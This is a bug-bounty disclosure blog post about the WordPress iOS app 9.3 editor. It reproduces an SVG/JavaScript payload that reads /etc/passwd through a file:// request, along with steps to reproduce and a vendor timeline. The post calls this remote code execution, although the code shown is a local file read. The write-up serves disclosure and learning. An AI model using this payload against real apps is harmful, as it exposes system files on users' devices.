Wednesday, February 21, 2018

[RCE] Remote Code Execution in Wordpress iOS Application (version 9.3)





Hello Everyone,

This article will show you how I found a Remote Code Execution Vulnerability in Wordpress iOS Application version 9.3 on my iPod Touch (iOS version 9.3.5). 

It was a cold thursday night of February 15 when I was looking for a good program to spend my night with. While checking on Hackerone's hacktivity page, I found some good stuffs to read and found out that Wordpress have some newly disclosed reports which gives me a motivation to spend my night on their program.

I fired up my sublist3r to check if there some good subdomains to hunt. after few hours of looking for some vulnerabilities on different subdomains and directories, I didn't find even one so I go to my inbox and check my previous reports on Wordpress. I noticed that I have reported an issue which I found on Wordpress iOS app a year ago.

My previous report gives me another idea so I downloaded the Wordpress iOS app again on my iPod Touch which is stuck on iOS version 9.3.5 since Apple didn't release an update anymore. while downloading the app, it says that the new version of the app is not compatible with my iOS version so I need to download the previous/older version of the app that is compatible for my device. So I download the Wordpress iOS app version 9.3 which is the recommended version from app store for device.

After downloading the app, I found some XSS issues but didn't reported it since it was just a self-XSS. after a few hours of having fun with the app, I found this Remote Code Execution vulnerability on the editor of the app. so below is the proof of concept I reported to wordpress.




Proof of Concept


Hello,

I found out that Wordpress IOS Application has a Remote Code Execution when posting a blog via IOS Application.

Tested in IOS 9.3.5

Injected Payload

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<svg xmlns="http://www.w3.org/2000/svg">

<script>

function readTextFile(file)

{

var rawFile = new XMLHttpRequest();

rawFile.open("GET", file, false);

rawFile.onreadystatechange = function ()

{

if(rawFile.readyState === 4)

{

if(rawFile.status === 200 || rawFile.status == 0)

{

var allText = rawFile.responseText;

alert(allText);

}

}

}

rawFile.send(null);

}
readTextFile("file:///../../../../../etc/passwd");

</script>

</svg>



Steps
  1. Login to your Wordpress account using Wordpress IOS Application
  2. Create a new blog post
  3. In the Post body tap the <> button then input the given payload.
  4. tap the <> button again and see the result.

I hope you will fix this issue as soon as possible.
Cheers and have a good day,

Evan


Result






Timeline 
Reported: February 15, 2018 
First Response: February 15, 2018 
Second Response (Marked as Needs more information): February 15, 2018 
Third Response (Marked as Informative): February 21, 2018   
Final Response (Hi. Sure, please feel free to publish it on your blog if you'd like.): February 21, 2018   






I hope you enjoy this article.



Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey
"Life is a journey that must be traveled no matter how bad the roads and accommodations."
~ Oliver Goldsmith
Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey
Life is a journey that must be traveled no matter how bad the roads and accommodations. Oliver Goldsmith
Read more at: https://www.brainyquote.com/topics/journey